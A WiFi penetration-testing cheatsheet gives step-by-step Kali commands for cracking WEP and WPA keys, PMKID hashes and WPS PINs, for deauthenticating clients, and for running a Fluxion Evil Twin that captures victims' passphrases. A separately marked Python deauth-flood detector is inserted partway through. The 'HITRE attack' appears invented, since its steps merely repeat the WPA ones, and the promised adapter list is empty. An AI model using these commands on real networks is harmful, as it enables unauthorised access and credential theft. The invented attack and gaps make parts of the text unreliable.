Welcome to the ultimate WiFi penetration testing cheatsheet, an essential resource for every ethical hacker. This guide walks you through testing WEP and WPA networks, the PMKID attack, the ARP request replay attack, WPS PIN attacks, the HITRE attack, and the Evil Twin method. We’ll also introduce popular automated tools and provide useful links for further learning.
This cheatsheet assumes that you have installed the Kali operating system and are competent with Linux-based tools. You will also need a WiFi adapter capable of packet injection.
Here are some common network adapters that are capable of packet injection:
It’s worth noting that compatibility can vary depending on the operating system and driver support. Additionally, this list is not exhaustive, and there may be other network adapters that support packet injection as well.
Table of Contents:
- WiFi Penetration Testing Overview
- Essential Tools for WiFi Penetration Testing
- WiFi Penetration Testing Cheatsheet: Step-by-Step Guide for WEP, WPA, PMKID, ARP Request Replay, WPS PIN, HITRE, and Evil Twin Attacks
1. WiFi Penetration Testing Overview
WiFi penetration testing is a critical component of network security, aiming to identify vulnerabilities in wireless networks and implement appropriate security measures. Our WiFi penetration testing cheatsheet covers various techniques and methodologies targeting WEP, WPA, WPA2, and WPA3 encryption standards.
2. Essential Tools for WiFi Penetration Testing
Here are some popular automated tools for WiFi penetration testing:
- Aircrack-ng Suite: https://www.aircrack-ng.org/
- Wireshark: https://www.wireshark.org/
- Reaver: https://github.com/t6x/reaver-wps-fork-t6x
- Wifite: https://github.com/derv82/wifite2
- Fluxion: https://github.com/FluxionNetwork/fluxion
- Fern WiFi Cracker: https://github.com/savio-code/fern-wifi-cracker
3. WiFi Penetration Testing Cheatsheet: Step-by-Step Guide for WEP, WPA, PMKID, ARP Request Replay, WPS PIN, HITRE, and Evil Twin Attacks
3.1 WEP Penetration Testing
- Enable monitor mode:
airmon-ng start wlan0
- Capture packets:
airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
- Crack the WEP key:
aircrack-ng [OUTPUT.cap]
3.2 WPA Penetration Testing
- Enable monitor mode:
airmon-ng start wlan0
- Capture WPA handshake:
airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
- Deauthenticate client:
aireplay-ng --deauth 5 -a [BSSID] -c [CLIENT] wlan0mon
- Crack WPA key:
aircrack-ng [OUTPUT.cap] -w [WORDLIST]
3.3 PMKID Attack
- Enable monitor mode:
airmon-ng start wlan0
- Capture PMKID:
hcxdumptool -i wlan0mon --enable_status 3 --filterlist=[TARGETS] --filtermode=2 --outfile=[OUTPUT]
- Convert to hashcat format:
hcxpcaptool -z [HASHFILE] [OUTPUT]
- Crack PMKID:
hashcat -m 16800 [HASHFILE] [WORDLIST] --force
3.4 ARP Request Replay Attack
- Enable monitor mode:
airmon-ng start wlan0
- Capture packets:
airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
- Perform ARP request replay:
aireplay-ng --arpreplay -b [BSSID] -h [CLIENT] wlan0mon
- Crack the WEP key:
aircrack-ng [OUTPUT.cap]
3.5 WPS PIN Attack
- Enable monitor mode:
airmon-ng start wlan0
- Scan for WPS-enabled networks:
wash -i wlan0mon
- Crack WPS PIN using Reaver:
reaver -i wlan0mon -b [BSSID] -c [CHANNEL] -vv -K 1
- Once the PIN is recovered, Reaver reports the WPA passphrase.
3.6 HITRE Attack (Handshake, Interactive, and Timing Resource Exhaustion)
- Enable monitor mode:
airmon-ng start wlan0
- Capture WPA handshake:
airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
- Repeatedly deauthenticate clients:
aireplay-ng --deauth [COUNT] -a [BSSID] wlan0mon
- Crack WPA key:
aircrack-ng [OUTPUT.cap] -w [WORDLIST]
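Both the handshake capture in 3.2 and the HITRE steps above rely on bursts of deauthentication frames, which is exactly what a wireless IDS looks for. The following is an added detection example, not code from the original cheatsheet; it runs a sliding-window rate check over a constructed list of management-frame records (the tuple layout `(timestamp, subtype, bssid, destination)` is a hypothetical summary of what a monitor-mode capture tool would give you).

```python
"""Added example: flag deauth/disassoc floods from 802.11 management frames.
Frame records are a constructed, hypothetical summary format: (ts, subtype,
bssid, dst). A normal roaming event emits one or two such frames; the
"--deauth N -a BSSID" pattern emits many within a few seconds.
"""
from collections import defaultdict, deque

DEAUTH = "deauth"
DISASSOC = "disassoc"


def detect_deauth_flood(frames, window=10.0, threshold=5):
    """Return {bssid: peak_count} for every BSSID that sent more than
    `threshold` deauth/disassoc frames inside any `window`-second span.

    frames: iterable of (ts, subtype, bssid, dst) tuples ordered by ts.
    """
    recent = defaultdict(deque)   # bssid -> timestamps still inside window
    peak = defaultdict(int)       # bssid -> largest count seen in a window
    for ts, subtype, bssid, _dst in frames:
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window:   # drop timestamps that aged out
            q.popleft()
        peak[bssid] = max(peak[bssid], len(q))
    return {b: c for b, c in peak.items() if c > threshold}


# Constructed sample: one ordinary deauth from one AP, then a burst of eight
# broadcast deauths from another AP within 3.5 seconds.
SAMPLE_FRAMES = [
    (0.0, "beacon", "aa:bb:cc:dd:ee:01", "ff:ff:ff:ff:ff:ff"),
    (1.0, DEAUTH, "aa:bb:cc:dd:ee:02", "11:22:33:44:55:66"),
] + [
    (20.0 + 0.5 * i, DEAUTH, "aa:bb:cc:dd:ee:01", "ff:ff:ff:ff:ff:ff")
    for i in range(8)
]

if __name__ == "__main__":
    for bssid, count in detect_deauth_flood(SAMPLE_FRAMES).items():
        print(f"deauth flood from {bssid}: {count} frames in window")
```

Enabling Protected Management Frames (802.11w) on the access point makes clients reject unauthenticated deauth frames in the first place, so a detector like this is a complement to that setting, not a substitute.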
3.7 Evil Twin Attack
- Install Fluxion:
git clone https://github.com/FluxionNetwork/fluxion
- Run Fluxion:
cd fluxion && ./fluxion.sh
- Select language and follow the on-screen instructions.
- Choose “Evil Twin AP” attack and configure the fake access point.
- Capture the WPA passphrase when the victim connects to the fake access point.
Conclusion:
This WiFi penetration testing cheatsheet offers a thorough overview of WiFi penetration testing techniques, automated tools, and a step-by-step guide for WEP, WPA, PMKID, ARP Request Replay, WPS PIN, HITRE, and Evil Twin attacks. Remember to use this information responsibly and ethically, and never engage in unauthorised hacking activities.